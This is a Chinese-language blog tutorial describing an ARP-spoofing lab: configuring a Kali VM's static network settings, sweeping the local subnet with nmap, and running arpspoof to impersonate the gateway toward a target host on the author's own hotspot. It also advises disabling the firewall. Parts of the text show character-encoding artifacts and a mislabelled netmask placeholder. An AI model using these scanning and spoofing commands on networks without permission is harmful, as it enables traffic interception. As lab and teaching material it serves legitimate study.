正文
話不多說,直接干!
- 首先我們需要準備一下環(huán)境,先配置VMARE,然后下載KALI的虛擬機。
詳細的安裝教程視頻:點擊跳轉(zhuǎn),下載KALI可能要半個小時,中間可以看個劇玩?zhèn)€游戲緩一緩。
- 配置好之后,我們需要先將網(wǎng)絡(luò)環(huán)境配好,我們將電腦連接到手機熱點上即可。
- 查看ip地址:用Win + R 打開cmd命令框,輸入ipconfig即可查看,查看WLAN網(wǎng)卡的ip和網(wǎng)關(guān)。
說明:這里的ipv4地址,網(wǎng)關(guān),子網(wǎng)掩碼下面都要用的。
- 配置網(wǎng)絡(luò)模式為橋接模式,開頭的視頻也有教程,這里就不再bb了。
- 配置網(wǎng)絡(luò)ip與主機到同一個網(wǎng)段。
- 第一步,直接輸入以下命令:普通用戶密碼是kali,root用戶就不用多說了。
sudo gedit /etc/network/interfaces
- 第二步,cv以下文本對照著下面的提示改:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface**
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 【直連電腦上同一網(wǎng)段的ip】
gateway 【直連電腦的網(wǎng)關(guān)】
netmask 【直連電腦的網(wǎng)關(guān)】
依照上面使用ipconfig命令查看套就行了,這里的address寫成電腦的ip地址加1即可。
說明:下面的是我自己實驗時改的:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface**
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 192.168.228.10
gateway 192.168.228.15
netmask 255.255.255.0
注意:記得保存,也就是按save鍵。
- 第三步:配置常用的DNS。
直接輸入以下命令:
sudo gedit /etc/resolv.conf
cv以下文本:
# Generated by NetworkManager
nameserver 192.168.97.46
nameserver 2409:8949:4c13:9a6::39
- 第四步:更新網(wǎng)絡(luò)配置
輸入以下命令:
/etc/init.d/networking restart
說明:弄完之后,最好重啟一下虛擬機。
- 使用nmap工具掃描所在網(wǎng)段的所有主機。
nmap -sP 192.168.228.10/24
#CIDR表示,這里是用虛擬機的ip地址/掩碼位數(shù).
#子網(wǎng)掩碼為255.255.255.0,每有一個255就是一個8,即 3 * 8 == 24位。
說明:虛擬機與直連電腦ping不通,或者nmap掃描不到很有可能是防火墻沒關(guān),把防火墻關(guān)了即可。
- 使用arpspoof進行arp欺騙。
sudo arpspoof -i eth0 -t 【要發(fā)送arp欺騙的目的主機的ip】 【網(wǎng)關(guān)ip,也就是偽裝成路由器】
#下面是我實驗時進行的命令。
sudo arpspoof -i eth0 -t 192.168.228.15 192.168.228.2
說明:這里的 -i 選項,即為我們的ip地址對應(yīng)的網(wǎng)卡,使用ip addr
即可查看。
這里我的配置的ip地址,為eth0網(wǎng)卡。
-
虛擬機欺騙效果:
-
實驗效果:
說明:停止ARP欺騙之后,主機還是可以正常ping通的,因為MAC地址是被臨時保存的以最新的為標準,之后就又換成路由器的MAC了。文章來源:http://www.zghlxwxcb.cn/news/detail-845204.html
尾序
我是舜華,期待與你的下一次相遇!
文章來源地址http://www.zghlxwxcb.cn/news/detail-845204.html
到了這里,關(guān)于【Linux進階之路】ARP欺騙實驗的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!